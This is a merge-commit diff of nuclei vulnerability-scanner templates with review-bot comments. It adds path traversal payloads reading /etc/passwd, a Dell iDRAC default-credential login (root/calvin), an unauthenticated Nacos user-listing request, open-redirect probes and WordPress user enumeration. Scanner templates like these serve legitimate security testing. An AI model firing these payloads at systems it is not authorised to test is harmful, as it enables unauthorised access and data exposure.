Merge pull request #19 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-02-26 23:54:55 +05:30 committed by GitHub
commit cbf9e05e26
15 changed files with 238 additions and 23 deletions


@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 |
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
| workflows | 21 | miscellaneous | 14 | default-logins | 11 |
| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 |
| exposures | 55 | technologies | 48 | misconfiguration | 48 |
| workflows | 22 | miscellaneous | 15 | default-logins | 12 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**62 directories, 604 files**.
**63 directories, 612 files**.
</td>
</tr>


@ -0,0 +1,27 @@
id: dell-idrac-default-login
info:
name: Dll iDRAC Default login
author: kophjager007
severity: high
tags: dell,idrac,dlogin
requests:
- method: POST
cookie-reuse: true
path:
- "{{BaseURL}}/data/login"
body: "user=root&password=calvin"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencode
Referer: "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <authResult>0</authResult>
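Review bot: The `Content-Type` header on the login request is misspelled — `application/x-www-form-urlencode` is missing the trailing `d`, so a server that honours the declared media type may not parse `user=root&password=calvin` as form fields, and the `<authResult>0</authResult>` match would then never fire on a host that is actually using the default credentials; change it to `Content-Type: application/x-www-form-urlencoded`. The `name` field also has a typo: `Dll iDRAC Default login` should read `Dell iDRAC Default login`. Indentation is not preserved in this rendering, so whether `cookie-reuse` and `headers` sit at request level could not be confirmed from here.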


@ -24,6 +24,13 @@ requests:
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: status
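Review bot: Some of the added payloads do not decode to a traversal and read like copy errors: L63 decodes to sixteen consecutive dots inside one path segment (`................etc/passwd`) and L66 uses the literal text `0x5c` instead of a percent-encoded separator. If these are aimed at a specific decoder quirk, a comment naming it (`# double-decoded / overlong variants for <SERVER-PLACEHOLDER>`) would stop the next maintainer from pruning them; otherwise they add requests per target without adding coverage. The request block and its matchers continue outside the hunk.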


@ -0,0 +1,29 @@
id: joomla-htaccess-file
info:
name: Joomla htaccess file disclosure
author: oppsec
severity: info
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
requests:
- method: GET
path:
- "{{BaseURL}}/htaccess.txt"
matchers-condition: and
matchers:
- type: word
words:
- "# @package Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200
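Review bot: This template carries no `tags:` entry, and the same is true of `joomla-manifest-file`, `dell-idrac-detect`, `gunicorn-detect` and `wp-uploads-listing` elsewhere in this commit, while `dell-idrac-default-login` and `wordpress-user-enumeration` do tag their product; add `tags: joomla` here (and the matching product tag to the others) so tag-based filtering and workflows can select them. The description also needs a wording fix: `Directory Listening` should be `Directory Listing`, and the sentence could read `Joomla provides an htaccess.txt file storing some HTTP and directory-listing configuration.`.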


@ -0,0 +1,29 @@
id: joomla-manifest-file
info:
name: Joomla manifest file disclosure
author: oppsec
severity: info
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/manifests/files/joomla.xml"
matchers-condition: and
matchers:
- type: word
words:
- "admin@joomla.org"
- "www.joomla.org"
condition: and
- type: word
words:
- "application/xml"
part: header
- type: status
status:
- 200
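Review bot: The description says joomla.xml stores the installed version, yet the template only confirms the file is served; an extractor capturing that version element would make the finding actionable, in the same way `dell-idrac-detect` in this commit extracts `fwver` — confirm the element name in the manifest before adding it. Wording: `a xml file which stores some informations` should be `an XML file that stores information`.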


@ -14,9 +14,15 @@ requests:
matchers:
- type: word
words:
- Airflow - DAGs
- "Content-Type: text/html"
part: header
- type: word
words:
- "<title>Airflow - DAGs</title>"
part: body
condition: and
- type: status
status:
- 200
- 200
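Review bot: `condition: and` on a matcher whose `words` list holds a single entry is a no-op; drop it, since the requirement that both the header and the body matcher hit is already expressed by `matchers-condition: and`. The header check `Content-Type: text/html` is a case-sensitive substring test, so a response that spells the header in lower case (as HTTP/2 responses do) would only match if nuclei canonicalises header names before matching — worth confirming before relying on it. Indentation is lost in this rendering, so which matcher the `condition` line belongs to is inferred.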


@ -1,30 +1,34 @@
id: unauthenticated-nacos-access
info:
name: Unauthenticated Nacos access
author: taielab
name: Unauthenticated Nacos access v1.x
author: taielab & @pikpikcu
severity: critical
# References:
# - https://github.com/alibaba/nacos/issues/4593
issues: https://github.com/alibaba/nacos/issues/4593
requests:
- raw:
- |
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Length: 2
- method: GET
path:
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
headers:
User-Agent: Nacos-Server
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: application/json"
part: header
- type: regex
regex:
- '"username":'
- '"password":'
- '"totalCount":'
condition: and
part: body
condition: and
- type: status
status:
- 200
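Review bot: The new `issues:` key under `info` does not appear in any other template on this page; as far as the repository convention goes, references belong in `reference:`, which keeps the link in a field tooling recognises (`reference: https://github.com/alibaba/nacos/issues/4593`). The three `regex` entries contain no metacharacters, so a `type: word` matcher with `condition: and` states the same check more plainly. Dropping `Content-Length: 2` along with the raw request looks intended for the switch to `method: GET`.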


@ -0,0 +1,44 @@
id: dell-idrac-detect
info:
name: Detect Dell iDRAC
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
requests:
- method: GET
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
path:
- "{{BaseURL}}/restgui/start.html"
- "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9)
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "Dell Integrated Remote Access Controller "
- "Integrated Dell Remote Access Controller"
- "iDRAC"
- "PowerEdge"
extractors:
- type: regex
part: header
regex:
- iDRAC/[0-9]{1,2}
- type: regex
part: body
regex:
- iDRAC[0-9]{1,2}
- type: regex
part: body
name: fwver
group: 1
regex:
- '"FwVer" *: *"([^"]+)"'
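Review bot: The word matcher's default `or` condition lets a bare `PowerEdge` or `iDRAC` on any 200 page — including `/login.html`, which many unrelated devices serve — satisfy the detection, and because `dell-idrac-workflow` in this commit chains the default-login template on every hit, a loose match here turns into a credential attempt against hosts that are not iDRAC; consider removing the bare `PowerEdge` entry or requiring one of the two full product-name strings. `"Dell Integrated Remote Access Controller "` on L217 has a trailing space inside the quotes that looks accidental and makes that entry stricter than its unquoted sibling on the next line. The header extractor `iDRAC/[0-9]{1,2}` has no comment naming which response header it is expected to read; one line saying so would help.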


@ -0,0 +1,25 @@
id: gunicorn-detect
info:
name: Detect Gunicorn Server
author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- gunicorn+
extractors:
- type: kval
part: header
kval:
- Server
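Review bot: The regex `gunicorn+` applies the quantifier only to the final `n`, so it matches `gunicorn`, `gunicornn`, … rather than expressing anything useful; the intended literal is `gunicorn` alone, or `gunicorn/[0-9.]+` if the version from the `Server` header is also wanted. Since the `kval` extractor already pulls the whole `Server` value, the plain literal is probably enough.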


@ -20,7 +20,6 @@ requests:
- '{{BaseURL}}//example.com/..;/css'
- '{{BaseURL}}/example%E3%80%82com'
- '{{BaseURL}}/%5Cexample.com'
- '{{BaseURL}}example.com'
- '{{BaseURL}}/example.com'
- '{{BaseURL}}\example.com'
- '{{BaseURL}}//example.com/'
@ -46,5 +45,5 @@ requests:
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$'
part: header
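Review bot: The widened class in the new Location regex (`[a-zA-Z0-9\-_\.@]*` immediately before `example\.com`) no longer requires a delimiter, so `Location: https://notexample.com` or `myexample.com` now satisfy the matcher, whereas the old pattern only accepted a dot-separated label in front of the domain. If the intent is to allow subdomains and a userinfo prefix, keep the delimiter mandatory: `(?:[a-zA-Z0-9\-_\.]*[\.@])?example\.com`. Neither version handles a lower-case `location:` header name; `(?mi)` in place of `(?m)` would. The matchers block continues past the end of the hunk.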


@ -2,7 +2,7 @@ id: wordpress-user-enumeration
info:
name: Wordpress user enumeration
author: Manas_Harsh
author: Manas_Harsh & daffainfo
severity: info
tags: wordpress
@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
matchers-condition: and
matchers:
- type: status
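Review bot: The added path `/?rest_route=/wp/v2/users/` has no comment explaining why it is needed next to `/wp-json/wp/v2/users/`; presumably it covers sites whose permalink settings do not expose the `/wp-json/` prefix, and a line such as `# same endpoint for sites without the /wp-json/ rewrite` above L293 would tell the next maintainer it is not a duplicate. Both paths share the matchers that start in this hunk and continue outside it.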


@ -1,4 +1,4 @@
id: wp-license
id: wp-license-file
info:
name: WordPress license file disclosure


@ -0,0 +1,31 @@
id: wp-uploads-listing
info:
name: WordPress Upload Directory Listing Enable
author: yashgoti
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/"
- "{{BaseURL}}/wp-content/uploads/2015/"
- "{{BaseURL}}/wp-content/uploads/2016/"
- "{{BaseURL}}/wp-content/uploads/2017/"
- "{{BaseURL}}/wp-content/uploads/2018/"
- "{{BaseURL}}/wp-content/uploads/2019/"
- "{{BaseURL}}/wp-content/uploads/2020/"
- "{{BaseURL}}/wp-content/uploads/2021/"
- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
matchers-condition: and
matchers:
- type: word
words:
- "Directory listing for"
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
- type: status
status:
- 200
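Review bot: `name: WordPress Upload Directory Listing Enable` should read `Enabled`. The year-named paths (2015–2021) are a hard-coded list that will need extending every year; since the same listing signatures are checked for every path, it may be worth noting in a comment why a hit on `/wp-content/uploads/` alone is not considered sufficient.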


@ -0,0 +1,11 @@
id: dell-idrac-workflow
info:
name: Dell iDRAC Security Checks
author: kophjager007
description: A workflow to identify Dell iDRAC instances and run all related nuclei templates.
tags: workflow
workflows:
- template: technologies/dell-idrac-detect.yaml
subtemplates:
- template: default-logins/dell/dell-idrac-default-login.yaml
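Review bot: The description promises to `run all related nuclei templates`, but only `dell-idrac-default-login` is chained; either narrow the wording to `run the default-login check` or list what else is meant. Because every detect hit triggers that login attempt, the precision of the `dell-idrac-detect` matchers (raised at that section) directly bounds how often this workflow sends credentials to hosts that are not iDRAC.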


@ -44,3 +44,5 @@ workflows:
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml
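Review bot: L359 points the workflow at `wp-license-file.yaml`, but the corresponding hunk earlier in this commit only changes the template's `id` from `wp-license` to `wp-license-file`; this rendering does not show whether the file itself was renamed, so confirm the path resolves or the workflow will reference a missing template. The same check applies to `vulnerabilities/wordpress/wp-uploads-listing.yaml` on L358, whose on-disk location the page does not show.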